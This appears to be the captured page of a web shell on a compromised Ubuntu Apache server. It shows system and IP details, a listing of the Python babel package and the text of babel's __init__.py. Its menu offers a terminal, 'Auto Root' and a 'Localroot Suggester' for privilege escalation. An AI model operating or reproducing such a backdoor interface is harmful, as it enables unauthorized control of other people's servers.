Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 216.73.216.120
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3 /
dist-packages /
babel /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2024-02-16 18:50
locale-data
[ DIR ]
drwxr-xr-x
2024-02-16 18:45
localtime
[ DIR ]
drwxr-xr-x
2024-02-16 18:53
messages
[ DIR ]
drwxr-xr-x
2024-02-16 18:53
__init__.py
714
B
-rw-r--r--
2019-12-31 12:31
_compat.py
1.65
KB
-rw-r--r--
2019-02-20 13:12
core.py
36.04
KB
-rw-r--r--
2019-05-27 12:43
dates.py
65.37
KB
-rw-r--r--
2021-05-01 15:13
global.dat
247.94
KB
-rw-r--r--
2021-05-01 15:13
languages.py
2.68
KB
-rw-r--r--
2018-07-20 10:31
lists.py
2.66
KB
-rw-r--r--
2019-05-27 12:43
localedata.py
7.21
KB
-rw-r--r--
2021-05-01 15:13
numbers.py
37.66
KB
-rw-r--r--
2019-12-31 12:09
plural.py
20.81
KB
-rw-r--r--
2019-05-27 12:43
support.py
21.78
KB
-rw-r--r--
2019-05-27 12:43
units.py
10.82
KB
-rw-r--r--
2019-12-31 09:08
util.py
7.4
KB
-rw-r--r--
2019-05-27 12:43
Save
Rename
# -*- coding: utf-8 -*- """ babel ~~~~~ Integrated collection of utilities that assist in internationalizing and localizing applications. This package is basically composed of two major parts: * tools to build and work with ``gettext`` message catalogs * a Python interface to the CLDR (Common Locale Data Repository), providing access to various locale display names, localized number and date formatting, etc. :copyright: (c) 2013-2019 by the Babel Team. :license: BSD, see LICENSE for more details. """ from babel.core import UnknownLocaleError, Locale, default_locale, \ negotiate_locale, parse_locale, get_locale_identifier __version__ = '2.8.0'